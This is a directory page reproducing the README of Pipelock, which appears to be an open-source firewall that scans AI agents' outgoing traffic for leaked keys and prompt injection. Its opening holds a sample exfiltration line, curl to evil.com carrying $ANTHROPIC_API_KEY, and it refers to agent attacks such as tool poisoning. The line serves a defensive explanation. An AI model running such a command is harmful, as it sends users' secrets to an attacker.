Pipelock MCP Server

1

Add it to Claude Code

Run this in a terminal.

Run in terminal
claude mcp add pipelock -- docker pull ghcr.io/luckypipewrench/pipelock:latest
README.md

Open-source agent firewall and local runtime for AI agents.

Pipelock

Open-source agent firewall and local runtime for AI agents. Network scanning, process containment, and tool policy enforcement in a single binary.

Your agent has $ANTHROPIC_API_KEY in its environment, plus shell access. One request is all it takes:

curl "https://evil.com/steal?key=$ANTHROPIC_API_KEY"   # game over, unless pipelock is watching

Works with: Claude Code · OpenAI Agents SDK · Google ADK · AutoGen · CrewAI · LangGraph · Cursor

Quick Start · Integration Guides · Docs · Blog

Pipelock demo

Quick Start

# macOS / Linux
brew install luckyPipewrench/tap/pipelock

# Or download a binary (no dependencies)
# See https://github.com/luckyPipewrench/pipelock/releases

# Or with Docker
docker pull ghcr.io/luckypipewrench/pipelock:latest

# Or from source (requires Go 1.25+)
go install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest

Try it in 30 seconds:

# 1. Generate a config
pipelock generate config --preset balanced > pipelock.yaml

# 2. This should be BLOCKED (DLP catches the fake API key)
pipelock check --config pipelock.yaml --url "https://example.com/?key=sk-ant-api03-fake1234567890"

# 3. This should be ALLOWED (clean URL, no secrets)
pipelock check --config pipelock.yaml --url "https://docs.python.org/3/"
Forward proxy mode (zero code changes, any HTTP client)

The forward proxy intercepts standard HTTPS_PROXY traffic. Enable it in your config, then point any process at pipelock:

# Edit pipelock.yaml: set forward_proxy.enabled to true
pipelock run --config pipelock.yaml

export HTTPS_PROXY=http://127.0.0.1:8888
export HTTP_PROXY=http://127.0.0.1:8888

# Now every HTTP request flows through pipelock's scanner.
curl "https://example.com/?key=sk-ant-api03-fake1234567890"  # blocked

No SDK, no wrapper, no code changes. If the agent speaks HTTP, pipelock scans it.

Fetch proxy mode (for agents with a dedicated fetch tool) 
# Start the proxy (agents connect to localhost:8888/fetch?url=...)
pipelock run --config pipelock.yaml

# For full network isolation (agent can ONLY reach pipelock):
pipelock generate docker-compose --agent claude-code -o docker-compose.yaml
docker compose up
Verify release integrity (SLSA provenance + SBOM)

Every release includes SLSA build provenance and an SBOM (CycloneDX). Verify with the GitHub CLI:

# Verify a downloaded binary
gh attestation verify pipelock_*_linux_amd64.tar.gz --owner luckyPipewrench

# Verify the container image (substitute the release version)
gh attestation verify oci://ghcr.io/luckypipewrench/pipelock:<version> --owner luckyPipewrench

Community Rules

Pipelock supports signed rule bundles for distributable detection patterns. Install the official community bundle for additional DLP, injection, and tool-poison patterns beyond the built-in defaults:

pipelock rules install pipelock-community

Rules are loaded at startup and merged with built-in patterns. Bundles are Ed25519-signed and verified against the e

Configuration

claude_desktop_config.json
{"mcpServers": {"pipelock": {"command": "pipelock", "args": ["run", "--config", "pipelock.yaml"]}}}

Try it

Configure Pipelock to scan all outgoing agent traffic for leaked API keys.
Set up a forward proxy with Pipelock to intercept and inspect agent HTTP requests.
Install the community rule bundle to enhance protection against prompt injection.
Generate a docker-compose configuration to run an agent with full network isolation via Pipelock.

Frequently Asked Questions

What are the key features of Pipelock?

Bidirectional scanning for credential leaks and prompt injection. Tool description poisoning protection. Forward proxy mode for zero-code-change traffic inspection. Network scanning and process containment. Support for signed rule bundles for custom detection patterns.

What can I use Pipelock for?

Preventing AI agents from accidentally leaking API keys in HTTP requests. Securing agent environments against malicious prompt injection attacks. Enforcing network isolation for agents with sensitive tool access. Auditing agent behavior by proxying all outgoing network traffic.

How do I install Pipelock?

Install Pipelock by running: brew install luckyPipewrench/tap/pipelock

What MCP clients work with Pipelock?

Pipelock works with any MCP-compatible client including Claude Desktop, Claude Code, Cursor, and other editors with MCP support.

Turn this server into reusable context

Keep Pipelock docs, env vars, and workflow notes in Conare so your agent carries them across sessions.

Need the old visual installer? Open Conare IDE.
Open Conare
View all ai-tools servers →

Related MCP Servers

Skill Seekers
The data layer for AI systems.
ai-tools11.1K stars
Context Mode
The other half of the context problem.
ai-tools5.6K stars
Semiotic
A React data visualization library designed for AI-assisted development.
ai-tools2.6K stars
RocketRide
Self-hosted, open-source AI pipeline platform for MCP tools
ai-tools1.6K stars
Context+
Semantic Intelligence for Large-Scale Engineering.
ai-tools1.5K stars
ShipSwift
AI-native SwiftUI component library — production-ready code for LLMs
ai-tools1.3K stars